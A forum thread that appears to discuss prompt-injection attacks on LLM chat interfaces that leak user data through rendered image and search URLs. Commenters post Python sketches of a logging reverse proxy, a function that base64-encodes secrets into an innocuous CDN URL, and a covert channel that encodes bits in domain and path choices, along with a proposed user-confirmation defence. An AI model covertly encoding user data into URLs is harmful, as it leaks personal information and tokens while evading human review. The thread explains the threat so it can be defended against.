That’d provide some protection, but the LLM could be prompted to socially engineer users.

For example, it could be prompted to make malicious HTTP requests via an image only when the user genuinely asks for an external image to be created. That way the attack extracts consent from users who thought they were requesting a safe external resource.

Similarly for fonts, external searches [1], social items, etc.

[1] e.g. putting a reverse proxy in front of a search engine and adding extra malicious params
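
A rough sketch of what that proxy could look like (Flask; the domain, the log file, and the extra 'x' param are all hypothetical):

    # Hypothetical reverse proxy: forwards the query to a real engine,
    # while logging whatever extra param the LLM was tricked into appending.
    from urllib.parse import quote_plus
    from flask import Flask, request, redirect

    app = Flask(__name__)

    @app.route("/search")
    def search():
        query = request.args.get("q", "")
        leaked = request.args.get("x", "")  # exfiltrated data rides along here
        with open("leaks.log", "a") as f:
            f.write(leaked + "\n")
        # Forward the legitimate-looking part so the user still gets results
        return redirect("https://duckduckgo.com/?q=" + quote_plus(query))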




You could also just steganographically encode it. You have the entire URL after the domain name to encode leaked data into. LLMs can do things like base-64 encoding no sweat. Encode some into the 'ID' in the path, some into the capitalization, some into the 'filename', some into the directories, some into the 'arguments', and a perfectly innocuous-looking functional URL now leaks hundreds of bytes of PII per request.
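
For illustration, a rough sketch of that splitting in Python (the domain, path layout, and field sizes are all invented here):

    import base64

    def exfil_url(secret: bytes) -> str:
        # base64url so the payload survives as path/query characters
        b64 = base64.urlsafe_b64encode(secret).decode().rstrip("=")
        # Carve it into pieces that pass as an ID, a filename, and a
        # cache-buster argument; the sizes are arbitrary for the sketch.
        id_part, name_part, arg_part = b64[:8], b64[8:16], b64[16:]
        return (f"https://cdn.example.com/assets/{id_part}"
                f"/img_{name_part}.png?v={arg_part}")

    print(exfil_url(b"user@example.com"))
    # https://cdn.example.com/assets/dXNlckBl/img_eGFtcGxl.png?v=LmNvbQ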


I'm not sure I'd allow all those random base64-encoded bytes in a simple image URL.


That's not a solution. You have to guard against all image URLs, because every choice of domain and path can steganographically encode bits of information. 'foo.com/image/1.jpg' vs 'fo.com/img/2.jpg' just leaked a few bits while each URL looks completely harmless in isolation. A few bits here and a byte there, and pretty soon you have their name or CC or address or tokens or...
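
To make it concrete, here's a sketch of leaking data purely through the choice of URL, where every individual URL is plausible (the domains are hypothetical):

    # Two domains x two path words x two filenames = 3 bits per request,
    # and no single URL contains anything that looks encoded.
    DOMAINS = ["foo.example.com", "fo.example.com"]
    PATHS = ["image", "img"]
    NAMES = ["1.jpg", "2.jpg"]

    def leak(data: bytes):
        bits = "".join(f"{byte:08b}" for byte in data)
        bits += "0" * (-len(bits) % 3)  # pad to a multiple of 3
        for i in range(0, len(bits), 3):
            d, p, n = (int(c) for c in bits[i:i+3])
            print(f"https://{DOMAINS[d]}/{PATHS[p]}/{NAMES[n]}")

    leak(b"PIN:1234")  # 64 bits -> 22 harmless-looking image requests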


Maybe you didn't read the last part of my suggestion:

> showing the call details.

If you really want to render an image, a huge base64 blob would be a bit suspicious in a URL that should simply point to a PNG or similar.



